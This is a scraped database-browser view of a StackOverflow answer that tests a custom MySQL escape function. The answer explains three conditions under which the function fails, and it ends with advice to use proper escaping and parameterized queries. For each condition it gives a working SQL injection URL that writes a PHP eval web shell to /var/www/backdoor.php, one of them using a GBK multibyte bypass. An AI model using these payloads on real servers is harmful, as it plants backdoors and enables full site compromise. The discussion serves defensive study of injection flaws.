Databases
StackOverflow2013
Postsdbo
PO
 

Note that there are some explanatory texts on larger screens.

plurals
  1. PO
    primarykey
    data
    text
    <p>If you are <strong>just</strong> replacing <code>'</code> with <code>''</code> then you could exploit this by injecting a <code>\'</code> which will turn into a <code>\''</code> and this will allow you to break out because this gives you a "character literal" single-quote and a real single-quote. However, the replacement of <code>"\\"</code> with <code>"\\\\"</code> negates this attack. The double-single-quote is used to "escape" single quotes for MS-SQL, but this isn't proper for MySQL, but it can work. </p> <p>The following codes <strong>proves</strong> that this escape function is safe for all except <strong>three conditions</strong>. This code permutes though all possible variations of control charters, and testing each one to make sure an error doesn't occur with a single quote encased select statement. This code was tested on MySQL 5.1.41.</p> <pre><code>&lt;?php mysql_connect("localhost",'root',''); function escape($value) { $value = str_replace("'","''",$value); $value = str_replace("\\","\\\\",$value); return $value; } $chars=array("'","\\","\0","a"); for($w=0;$w&lt;4;$w++){ for($x=0;$x&lt;4;$x++){ for($y=0;$y&lt;4;$y++){ for($z=0;$z&lt;4;$z++){ mysql_query("select '".escape($chars[$w].$chars[$x].$chars[$y].$chars[$z])."'") or die("!!!! $w $x $y $z ".mysql_error()); } } } } print "Escape function is safe :("; ?&gt; </code></pre> <p><strong>Vulnerable Condition 1: no quote marks used.</strong></p> <pre><code>mysql_query("select username from users where id=".escape($_GET['id'])); </code></pre> <p>Exploit:</p> <pre><code>http://localhost/sqli_test.php?id=union select "&lt;?php eval($_GET[e]);?&gt;" into outfile "/var/www/backdoor.php" </code></pre> <p><strong>Vulnerable Condition 2: double quote marks used</strong></p> <pre><code>mysql_query("select username from users where id=\"".escape($_GET['id'])."\""); </code></pre> <p>Exploit:</p> <pre><code>http://localhost/sqli_test.php?id=" union select "&lt;?php eval($_GET[e]);?&gt;" into outfile "/var/www/backdoor.php" -- 1 </code></pre> <p><strong>Vulnerable Condition 2: single quotes are used, however an <a href="http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string" rel="noreferrer">alternative character set is used.</a></strong>. </p> <pre><code>mysql_set_charset("GBK") mysql_query("select username from users where id='".escape($_GET['id'])."'"); </code></pre> <p>Exploit:</p> <pre><code>http://localhost/sqli_test.php?id=%bf%27 union select "&lt;?php eval($_GET[e]);?&gt;" into outfile "/var/www/backdoor.php" -- 1 </code></pre> <p>The conclusion is to always use <code>mysql_real_escape_string()</code> as the escape routine for MySQL. Parameterized query libraries like pdo and adodb always use <code>mysql_real_escape_string()</code> when connected to a mysql database. <code>addslashes()</code> is <strong>FAR BETTER</strong> of an escape routine because it takes care of vulnerable condition 2. It should be noted that not even <code>mysql_real_escape_string()</code> will stop condition 1, however a parameterized query library will.</p>
    singulars
    1. This table or related slice is empty.
    1. POFound a weak escape function for MySql, how to exploit?
      singulars
      1. PTQuestion
    1. PTAnswer
    1. USrook
    1. USrook
    plurals
    1. This table or related slice is empty.
    1. This table or related slice is empty.
    1. POFound a weak escape function for MySql, how to exploit?
      singulars
      1. PTQuestion
    1. This table or related slice is empty.
    1. VO
      singulars
      1. PO
      1. This table or related slice is empty.
      1. VTUpMod
    2. VO
      singulars
      1. PO
      1. This table or related slice is empty.
      1. VTUpMod
    3. VO
      singulars
      1. PO
      1. This table or related slice is empty.
      1. VTDownMod
    1. CO@Pekka thank you.
      singulars
      1. PO
      1. USrook
    2. COA very thorough answer. The conclusion is that in my situation the escape function is safe. Just checking for control characters is not solid proof though. The only way to do that is to actually check all UTF-8 sequences (and invalid ones probably). I'm tempted to just award you for a best effort answer though, I don't think there are any known attack vectors.
      singulars
      1. PO
      1. USEvert
    3. CO@Col. Shrapnel understanding escape function is vital to understanding injection flaws. For instance you are incorrect about the apostrophe, in this case the apostrophe will be a character literal single quote. Although parametrized query libraries are built on escape function and done automatically for you, you should still understand fundamentals of these security systems.
      singulars
      1. PO
      1. USrook
 

Querying!

 
Guidance
A row detail

Detail views are divided into sections. All the information in the data section comes from columns in the selected row. The other sections display data from other, related rows.

Related data can be related in a to-one or a to-many fashion. Captions of data related in a to-many fashion link to a list view showing a filtered view of the table.

Try moving around until you find a non-empty to-many entry and click on the label to get to one. You can move back to the root by clicking on the database name in the header.

SQuiL has stopped working due to an internal error.

If you are curious you may find further information in the browser console, which is accessible through the devtools (F12).

Reload